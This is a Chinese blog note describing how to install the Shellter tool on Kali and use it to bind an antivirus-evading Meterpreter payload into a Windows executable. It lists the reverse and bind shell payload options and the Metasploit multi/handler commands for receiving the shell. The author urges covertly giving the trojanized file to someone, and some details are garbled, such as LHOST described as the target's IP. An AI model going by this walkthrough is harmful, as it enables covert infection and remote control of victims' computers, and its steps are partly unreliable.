记录一下shellter 使用
今天在春秋的视频上看到了kali一款工具的使用 shellter
看大佬的视频学习的 这是他整理的 https://bbs.ichunqiu.com/thread-25177-1-1.html 最好还是去这看
首先先说一下 怎么安装这个工具(我用的是kali 2018版本),这个版本反正是没有这个软件,需要自己安装。
安装命令也和平常一样,apt install shellter。
当然 也可以在下面的网址,下载。zip的解压命令 unzip 你的zip包
https://www.shellterproject.com/
不过我在第一次安装这个工具的时候,刚开始提示了错误,什么wine32啥的 。如果提示,把这个也安装上。apt install wine32
然后在kali 直接敲命令 shellter 就OK了。
在来说说这款工具,是一个免杀的木马捆绑软件。(不过自己做了一次,360直接给杀了,准备在多详细了解一下这个工具,看看是不是真的可以做到免杀)。然后配合msf使用。
在来说一下工具的使用,首先进入这个工具。
这个界面 A 代表自动 M 是高级的用法,也应该是用M来做到免杀吧,自己还没有试。 H 也就是帮助了
身为一个小白,当然果断选A。
会有PE 这个 就是你要捆绑的文件目录
我的就在root下 /root/你要捆绑的软件。
输入完毕 回车 等一会 因为他在捆绑,生成东西这个过程。
输入Y 隐身
这时会问你选择哪种方式,
Meterpreter_Reverse_TCP 这种是基于TCP的反向链接,换句话说,谁出发了这个模块,她会吧这个触发者的shell发送给指定的人
Meterpreter_Reverse_HTTP 这个是基于 http网页传输的反向链接 和上面大同小异,只不过 上面的基于TCP链接,这个是用GET 或者 POST进行发送接收
Meterpreter_Reverse_HTTPS 这个 和上面的也差不多,只不过这个的数据被加密,也是基于http的传输方式
Meterpreter_Bind_TCP 这个就不同了,这个是正向的链接,需要攻击者知道,是谁出发的这个模块,比较类似后门程序,
Shell_Reverse_TCP 和上面相同,也是反向链接,只不过可以用shell直接接收会话。(此处是在别人那拿过来的,我也是看着他的视频学习的 i春秋 屌丝绅士 大佬)。
这是根据选的什么方式,来自己填IP 和端口。端口随意,只要是没用的。然后等一会 回车 就做完了。就该把你的这个文件偷偷给某个人,来试一试你的成果了。
接下来的步骤就不截图了 把命令写一下。
用到MSF
use expolit/multi/handler
set payload windows/meterpreter/reverse_tcp 之前的工具 我选的是第一个 reverse—tcp。所以在最后这个地方选自己对应的。
set LHOST 你目标的IP
set LPORT 你在工具中设置的端口
设置完这三个 exploit
监听 等着别人用你捆绑的软件。接会有提示。